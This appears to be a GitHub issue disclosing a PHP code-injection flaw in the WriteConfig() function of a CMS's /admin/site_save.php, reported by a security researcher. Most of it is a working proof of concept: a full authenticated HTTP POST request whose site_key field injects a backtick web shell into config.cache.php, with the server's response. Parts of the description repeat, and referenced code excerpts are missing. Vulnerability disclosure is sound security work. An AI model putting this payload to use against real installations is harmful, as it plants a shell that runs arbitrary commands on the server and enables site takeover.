#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Becase of filtered input without "<, >, ?, =, `,...." In WriteConfig() function, the attacker can inject php code to /include/config.cache.php file. The attacker can append ?> to close php syntax and adding new php function
In /admin/site_save.php file
WriteF() function:
###PoC:
In config.cache.php file
Then back to .php files in /admin/ directory to execute code
###Request
POST /admin/site_save.php HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Origin: http://172.16.0.12:2222
Connection: close
Referer: http://172.16.0.12:2222/admin/site_add.php
Cookie: PortalOpenEMR=BKEx0ZLJ9X41gReq-UHNt-aC0jHNPiQLUOf7FXckqCAumudg; OpenEMR=UwreHaTw9iqwJWXqAY3%2CWYkZgvA3wdVmymdC5QqiVC1H2scM; loader=loaded; admin_lang=cn; home_lang=cn; workspaceParam=users_index%7CMember; referurl=%2Findex.php%3Fm%3Duser%26c%3DUsers%26a%3Dcentre; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; users_id=1; PHPSESSID=qhclrgdoah7rbv9l34fvj07h00
Upgrade-Insecure-Requests: 1
site_name=123&site_key=kietna?><?=`$_GET[0]`?><?&site_lang=testtest&webname=123&weburl=http%3A%2F%2F172.16.0.12%3A2222&webpath=123&webswitch=Y&action=add
###Response
HTTP/1.1 200 OK
Date: Sun, 22 Aug 2021 07:54:03 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12942
<script type="text/javascript">window.top.location.reload();</script>
The text was updated successfully, but these errors were encountered:
KietNA-HPT
changed the title
PHP Code Execution via create new site function in site_save.php
PHP Code Execution via WriteConfig() function
Aug 22, 2021
#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center
#Submit date: 22/08/2021
#Condition: Admin user
#Version: v5.6
#Description:
Becase of filtered input without "<, >, ?, =, `,...." In WriteConfig() function, the attacker can inject php code to /include/config.cache.php file. The attacker can append ?> to close php syntax and adding new php function
In /admin/site_save.php file

WriteF() function:

###PoC:

In config.cache.php file
Then back to .php files in /admin/ directory to execute code

###Request
###Response
The text was updated successfully, but these errors were encountered: